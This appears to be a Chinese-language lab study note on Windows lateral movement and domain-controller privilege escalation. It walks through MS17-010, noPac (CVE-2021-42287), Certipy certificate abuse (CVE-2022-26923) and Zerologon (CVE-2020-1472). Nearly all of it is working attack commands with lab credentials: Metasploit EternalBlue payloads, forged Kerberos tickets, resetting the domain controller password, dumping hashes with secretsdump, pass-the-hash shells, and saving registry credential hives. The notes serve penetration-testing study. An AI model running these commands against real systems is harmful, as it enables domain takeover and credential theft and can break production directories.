案例一:横向移动-系统漏洞-CVE-2017-0146
这个漏洞就是大家熟悉的ms17-010,这里主要学习cs发送到msf,并且msf正向连接后续
原因是cs只能支持漏洞检测,而msf上有很多exp可以利用
注意msf不能使用4.5版本的有bug
这里还是反弹权限,然后提权到system
设置监听器
msf开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
exploit
转发msf上
转发到刚才的会话上
msf成功上线
这是3网段的主机,所以可以连接到3网段所有主机,但是需要设置路由
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
会话放入后台
这里利用ms17-010的时候反向没有办法上线的,因为内网的主机不出网,只有正向去连接他
首先先检测是否有该漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.3.21-32 //设置扫描目标段
set threads 5 //设置扫描线程数
run
这里我的域控环境网段不是连续的,就扫描一个dc
可以利用,这里因为内网是不出网的所以需要借助已经拿到的机器,去控制目标主机,正向连接
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp //正向连接上线
set rhost 192.168.3.25 //设置连接目标或者范围
run
本来是希望去控制域控主机的,但是域控主机似乎做了某种限制,这里我控制的是sqladmin
成功
msf正向连接中,设置了路由就可以,甚至不用上传木马,不知道是不是msf17-010的溢出不用
案例二: 横向移动-域控提权-CVE-2014-6324
在这篇文章里面复现过
第130天:内网安全-横向移动&PTH哈希&PTT 票据&PTK密匙&Kerberos&密码喷射-CSDN博客
案例三:横向移动-域控提权-CVE-2021-42287
前提条件:一个域内普通账号
影响版本:Windows基本全系列
这篇文章也复现过,这里还有不同的工具
第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_windows 提权漏洞补丁 ad域-CSDN博客
方法一:
同样先上线,代理转发
项目下载地址:
https://github.com/safebuffer/sam-the-admin
python3 sam_the_admin.py 域名/'域控主机账号:密码' -dc-ip 域控ip -shell
python3 sam_the_admin.py 0day.org/'administrator:123.com' -dc-ip 192.168.3.142 -shell
查看获得的权限啊
方法二:
nopac下载地址: https://github.com/cube0x0/noPac
把这个文件导入到visual studio中
编译生成文件
在这个目录下会生成exe文件
这里按理说应该设置代理在本地运行,我是linux系统没办法设置,直接上传本地运行
出现下面的提示代表有漏洞
noPac.exe scan -domain 0day.org -user jack -pass admin!@#45
生成票据
noPac.exe -domain 0day.org -user jack -pass admin!@#45 /dc 域控名 /mAccount 乱输一个用户名 -mPassword 乱输一个密码 /service 乱输一个服务 /ptt
noPac -domain 0day.org -user jack -pass admin!@#45 /dc owa2010sp3.0day.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt
PsExec \\owa2010cn-god.god.org cmd
现在查看票据里面就有一个administrator的票据
利用工具建立连接
psexec.exe \\域控主机名 cmd
案例四:WIN-域控提权-CVE-2022-26923
利用条件
一个域控内普通的账号密码
并且域控内有ca证书服务器
dnshostname不唯一
查看域内是否有证书服务器
certutil -config - -ping
没有的情况
如果有证书服务器
资源下载地址:GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
安装必要的插件
python3 setup.py install
首先先申请一个证书
certipy req 'ip/域用户名:密码@域控计算机名' -target-ip 域控ip -ca CA服务器名 -template User -debug
certipy req '192.168.3.142/jack:admin!@#45@OWA2010SP3.0day.org' -target-ip 192.168.3.142 -ca 0day-OWA2010SP3-CA -template User -debug
检测证书
certipy auth -pfx jack.pfx -dc-ip 192.168.3.142 -debug
添加计算机账号
项目地址:GitCode - 全球开发者的开源社区,开源代码托管平台
python3 bloodyAD.py -d 域控名 -u 普通用户名 -p '普通用户密码' --host 域控ip addComputer 计算机名 '计算机密码'
python3 bloodyAD.py -d 0day.org -u jack -p 'admin!@#45' --host 192.168.3.142 addComputer pwnmachine 'CVEPassword1234*'
域控计算机中这台主机被成功添加了进去
这一步是需要将计算机名更新为与域控一样的名字,在这一步实验的过程中发现无法实现,原因是由于dnshostname在这个环境当中是唯一的
python3 bloodyAD.py -d 0day.org -u jack -p 'admin!@#45' --host 192.168.3.142 setAttribute 'CN=pwnmachine,CN=Computers,DC=0day,DC=org' dNSHostName '["OWA2010SP3.0day.org"]'
后续操作先看这篇文章把
第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_ad域控提权-CSDN博客
案例五:WIN-域控提权-CVE-2020-1472
影响范围以及利用条件
CVE-2020-1472 是继 MS17010 之后好用的 NetLogon 特权域控提权漏洞,
影响 Windows Server 2008R2 至 Windows Server 2019 的多个版本系统,
只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞 .
该漏洞不要求当前计算机在域内 , 也不要求当前计算机操作系统为 Windows
资源下载地址
POC:https://github.com/SecuraBV/CVE-2020-1472
EXP:https://github.com/dirkjanm/CVE-2020-1472
Impacket:https://github.com/fortra/impacket
获取计算机名,这里这条命令设置代理后,好像识别不出来这条命令无法执行,我只能设置在一个网段运行。。。,但是也有别的办法获取
nbtscan -v -h 192.168.3.21
可以用这种方式获取计算机
测试漏洞是否能够正常使用
python3 zerologon_tester.py OWA2010SP3 192.168.3.142
因为设置代理的话这里是一个一个数据包进行发送的,所以会比较慢。
清空密码凭证
python3 cve-2020-1472-exploit.py OWA2010SP3 192.168.3.142
利用impack套件导出hash
python3 secretsdump.py 0day.org/OWA2010SP3\$@192.168.3.142 -no-pass
导出hash,上面的admin是域控本地的admin而下面的是域控内的
利用套件里面的wmiexec进行连接
python3 wmiexec.py Administrator@192.168.3.142 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942
这中方式一般不要使用,会导致内网崩溃!!!,用完记得恢复hash
重置hash的方式:https://zhuanlan.zhihu.com/p/627855713
运行这三条命令
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
生成三个文件
这三个文件保存在本地,利用套件里面的secretdump文件恢复 ,但是他这个只能是在系统本地运行,系统不一定有python环境啊
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
利用powershell执行这条命令